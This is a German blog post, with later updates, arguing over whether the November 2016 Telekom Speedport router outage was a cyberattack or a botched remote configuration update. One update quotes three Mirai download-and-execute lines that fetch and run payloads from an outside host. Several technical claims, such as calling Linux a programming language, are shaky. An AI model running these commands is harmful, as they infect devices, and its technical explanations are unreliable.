Schlagwort-Archive: TR-069

Cyberwar oder einfach nur technisches Versagen?

Share Button

OK, ich lehne mich mit meiner Ansicht über die massive Telekom- Störung vom 27. November 2016 ziemlich weit aus dem spekulativen Fenster. Bei dieser Störung handelt es sich um den Ausfall von etwa 900000 Internetanschlüssen von ausschließlich Telekom- Kunden.

Quelle: Telekom
Quelle: Telekom

Das Bundesamt für Sicherheit in der Informationstechnik (BSI) hat sich zu einem gewagten Statement hinreißen lassen:

Das BSI ordnet diesen Ausfall einem weltweiten Angriff auf ausgewählte Fernverwaltungsports von DSL-Routern zu. Dieser erfolgte, um die angegriffenen Geräte mit Schadsoftware zu infizieren. Diese Angriffe wurden auch in dem vom BSI geschützten Regierungsnetz registriert, in dem sie aber auf Grund funktionierender Schutzmaßnahmen folgenlos blieben.

Ich glaube nicht, dass ein Hackerangriff für den Ausfall von Routermodellen ausschließlich des Typs Speedport und nur bei der Telekom verantwortlich ist/war.

Was spricht gegen diese Theorie, womit übrigens bereits kräftig politisch Kapital daraus geschlagen und gleichzeitig das technische Versagen der Telekom verschleiert wird?

1. Es existierte eine Störungsmeldung der Telekom bereits vor bzw. parallel zu der prominenteren, wo über 900000 Kunden betroffen sind/waren. Die Störmeldung lautet wörtlich:

„Automatische Routerkonfiguration funktioniert teilweise nicht“.

Quelle: Telekom
Quelle: Telekom

Es wurde also versucht, automatisch Änderungen an der Konfiguration vorzunehmen, wie das z.B. bei Firmware- Updates üblich ist, wenn der Kunde den Zugang hierfür auf seinem Router geöffnet hat. Das muss jetzt nichts mit der Folgestörung zu tun haben, wäre aber plausibel für den Fall, dass die neu eingespielte Firmware fehlerhaft gewesen sein sollte.

2. Angenommen, es wäre tatsächlich ein Cyber- Angriff auf jene Speedport- Routermodelle mit einer entsprechenden Sicherheitslücke der Grund für die massenhaften Ausfälle, wäre das aus Sicht der Angreifer doch eher sinnlos. Cyber- Kriminelle würden sich ja selbst das eigene Ziel für ihre Aktionen versperren, indem sie diese Internetanschlüsse quasi abschalten. Das ergibt eigentlich keinen Sinn.

3. Die von der Telekom eingeleiteten Maßnahmen zur Problemlösung in Form eines Konfigurationsupgrades deuten eher darauf hin, dass ein typischer Konfigurationsfehler behoben werden soll, als dass eine augenscheinlich bekannte Sicherheitslücke geschlossen werden soll. Würde nur eine Sicherheitslücke geschlossen werden, würde man damit nicht unbedingt auch wieder die Internetverbindung herstellen.

4. Schaut man sich die Kommentare diverser betroffener Telekom- Kunden an, so konnten viele das Problem lösen, indem sie ihre Endgeräte manuell auf einen anderen DNS- Server eingestellt haben (z.B. 8.8.8.8 von Google). Da diese Leute danach erfolgreich das Internet über den angeblich manipulierten Router und dessen womöglich fehlerhafter DNS- Konfiguration nutzen konnten, ist das ein erhebliches Indiz dafür, dass schlicht ein Konfigurationsfehler im Router zu bemängeln wäre. Das könnte z.B. spekulativ, aber plausibel darauf zurückzuführen sein, dass ein automatisches Router- Update fehl schlug und dabei eine falsche Adresse des Telekom- DNS- Servers eingetragen wurde. Dieser Lösungsansatz, der ja auch nachweislich bei vielen Leuten funktionierte, würde die Theorie eines Cyber- Angriffs deutlich schwächen.

5. In der Telekom- Störungsmeldung wird außerdem berichtet, dass man den Hersteller des Routers in die Fehlerbeseitigung involviert hat. Wären Modelle anderer Hersteller ebenfalls betroffen, hätte man nicht von einem Hersteller (im Singular) gesprochen, was man bei solchen Cyber- Angriffen durchaus erwarten müsste. Durch die bisher allerdings spärlich vorhandenen Informationen deutet alles eher darauf hin, dass die besagten Routermodelle womöglich lapidar durch ein automatisches Update lahm gelegt wurden. Die Zahl von etwa 900000 betroffenen Geräten deutet wiederum darauf hin, dass zwar viele Anschlüsse betroffen waren, aber lange nicht alle, die diese Routermodelle verwenden. Das kann eventuell damit zu erklären sein, dass eben nicht alle Router für ein automatisches Upgrade freigeschaltet waren/sind. Da müsste man jetzt Feedback von Telekom- Kunden bekommen, die mit den gleichen Routermodellen eben nicht vom Ausfall betroffen gewesen sind und ob tatsächlich die automatische Updatefunktion abgeschaltet ist. (Immerhin einen solchen Telekom- Kunden kenne ich persönlich.)

6. Befasst man sich mit der vom BSI propagierten Sicherheitslücke näher, klingt deren Schlussfolgerung keineswegs plausibel. Man sieht das TR-069 Protokoll, welches für Fernwartungszwecke für Kunden- Router eingesetzt wird, als potentielle Sicherheitslücke und auch im aktuellen Fall verantwortlich für die massenhaften Ausfälle. Die Kommunikation erfolgt über den Port 7547, was aber nicht zwingend sein muss.

Hierzu existiert ein offizielles Statement der Telekom auf eine entsprechende Kundenanfrage aus dem Jahr 2014, als die Sicherheitslücke des TR-069 Protokolls publiziert wurde:https://telekomhilft.telekom.de/t5/Geraete-Zubehoer/Offener-TCP-Port-7547-aus-dem-Internet/td-p/1092313/page/2

Quelle: https://telekomhilft.telekom.de/t5/Geraete-Zubehoer/Offener-TCP-Port-7547-aus-dem-Internet/td-p/1092313/page/2

 

Genau genommen müssten die Hacker demnach eher die Management- Server der entsprechenden Provider angreifen, um tatsächlich Zugriff auf betroffenen Router zu erlangen. Der Aufwand in Bezug auf den zu erwartenden Nutzen wäre gering.  Es ist nicht ungewöhnlich, dass im Internet Ports gescannt werden und der Port 7547 (TR-069 bzw. TR-064) bildet keine ungewöhnliche Ausnahme. Der Angreifer müsste sich nach dieser These einen Remote- Zugang auf einen schwach geschützten Kunden- Router verschaffen, um dann wiederum eine Kommunikation zum Provider- Management- Server herstellen zu können. Dann müsste der Angreifer schließlich noch die Sicherheitshürden des entsprechenden Management- Servers überwinden, um schließlich Zugriff auf alle Kunden- Router, die die Fernwartungsschnittstelle geöffnet haben, zugreifen zu können. Das wäre unter Umständen mit viel Aufwand und Glück möglich, würde aber absolut keinen Sinn ergeben, indem man nach diesem Aufwand einfach nur die Kunden- Router vom Netz trennt und damit auch den eigenen Zugriff darauf unterbindet.

7. Und schließlich wäre es allein aus Analysezwecken interessant und wichtig gewesen, an betroffenen Anschlüssen mal andere Routermodelle zu verwenden, ob dadurch der Fehler hätte behoben werden können. Darüber schweigt man sich aus, denn es würde nachweisen, dass der Cyber- Angriff erfunden wäre. Andere Routermodelle verwenden ebenfalls jene Fernwartungsschnittstelle. Wieso waren absolut keine anderen Router als jene Speedport- Modelle betroffen?

Wie dem auch sei, mir kommt als jemand, der sich ein wenig mit IT- Technik auskennt, diese Geschichte ziemlich suspekt vor.

Zwischenzeitlich verbreitet sich die Nachricht, dass tatsächlich eine schlecht programmierte Malware gezielt DSL- Router mit der inzwischen als verantwortlich erklärten Sicherheitslücke für die Ausfälle zuständig gewesen sein soll.

Würde sich nur ein einziger Telekom- Kunde melden, dessen Speedport- Router nicht jene Easy- Support Funktion eingeschaltet hatte und auch nicht betroffen gewesen wäre, würde die Telekom in Erklärungsnot geraten. Denn betroffene Telekom- Kunden, die durch Änderung des DNS- Server- Eintrages im Router das Problem selbst lösen konnten, mussten ja hingegen vom Zugriff von außen schließlich betroffen gewesen sein. Wenn also beide Fälle nachzuweisen wären, wäre die Cyber- Attacke als Erklärung recht dürftig.

Update 29.11.2016

 

telekom_stoerung4atelekom_stoerung4btelekom_stoerung4ctelekom_stoerung4d

 

 

 

 

 

 

 

 

Für den Fall, dass doch tatsächlich ein Hacker- Angriff der Auslöser für diese Großstörung der Telekom gewesen sein sollte, muss man der Telekom grobe Fahrlässigkeit unterstellen.

Wie erwähnt, hat man die Telekom bereits 2014 auf diese mögliche Schwachstelle hingewiesen. Jedoch hat die Telekom diesen Hinweis nicht ernst genommen bzw. sogar ignoriert. Es wurde versichert, dass nur der Telekom- Server Zugriff per „Easy Support“ herstellen könnte…

Ein Auszug aus dem Code des berüchtigten Mirai- Virus:

cd /tmp;wget http://l.ocalhost.host/x.sh;chmod 777 x.sh;./x.sh

`cd /tmp;tftp -l 3 -r 1 -g l.ocalhost.host;chmod 777 3;./3`

`cd /tmp;wget http://l.ocalhost.host/1;chmod 777 1;./1`

Grob gefasst, wird an das Gerät über einen Port, der nach außen, also in Richtung Internet, offen sein muss, eine entsprechende Anfrage gestellt. Das soll über den Port 7547 geschehen sein, der augenscheinlich für die Fernwartung von Seiten der Telekom für Speedport- Router standardmäßig geöffnet ist.

Das genügt jedoch nicht, um Befehle auszuführen. Hierfür muss natürlich vorher eine Authentifizierung erfolgen, ob die Remote- Anfrage auch berechtigt ist, Zugriff zu erhalten. Das scheint ja immerhin bei 900000 Routern der Telekom dann mit Erfolg praktiziert worden zu sein. Das Virus bedient sich dabei einem recht simplen Verfahren, indem es einfach der Reihe nach typische Standardpasswörter probiert. Danach können dann Befehle ausgeführt werden, die wie oben Daten nachladen, Berechtigungen von Dateien ändern usw.

Demnach wäre auch die Aussage auf die Frage im Jahr 2014 falsch, dass ausschließlich eine Verbindung zu einem Management- Server der Telekom über das TR-069 Protokoll möglich wäre.

Update 30.11.2016:

Die Anzeichen für einen Cyber- Angriff haben sich verdichtet. IT- Experten, allerdings nicht von der Telekom, haben den Angriff analysiert. Demnach war es kein gezielter Angriff durch russische Cyber- Soldaten, wie es zwischenzeitlich in den Medien propagiert wurde, sondern eben die übliche Prozedur von Internet- Kriminellen, welche Schwachstellen in der IoT- Umgebung (Internet of Things) permanent absuchen.

Die leider nicht geschlossenen Sicherheitslücken waren schließlich ausschlaggebend für das erfolgreiche Infizieren der Malware, welche wohl ein Derivat des berüchtigten Mirai- Virus war.

Die Speedport- Router waren auch nicht abgestürzt, sondern nur funktional eingeschränkt, da ja einige Telekom- Kunden durch das Ändern der DNS- Einträge auf den Endgeräten den Router immerhin noch als DSL- Modem verwenden konnten.

Die Aussagen von Seiten der Telekom bzw. des BSI, dass die Malware schlecht programmiert gewesen sein soll und dadurch nicht das eigentliche Ziel erreichte, sind falsch. Tatsächlich konnte die Malware nicht die Router- Software manipulieren, weil die Betriebssystem- Routinen nicht kompatibel mit der Programmiersprache (Linux) der Malware waren. Das deutet darauf hin, dass es definitiv kein gezielter Cyber- Angriff auf die Telekom- Infrastruktur gewesen sein kann.

Share Button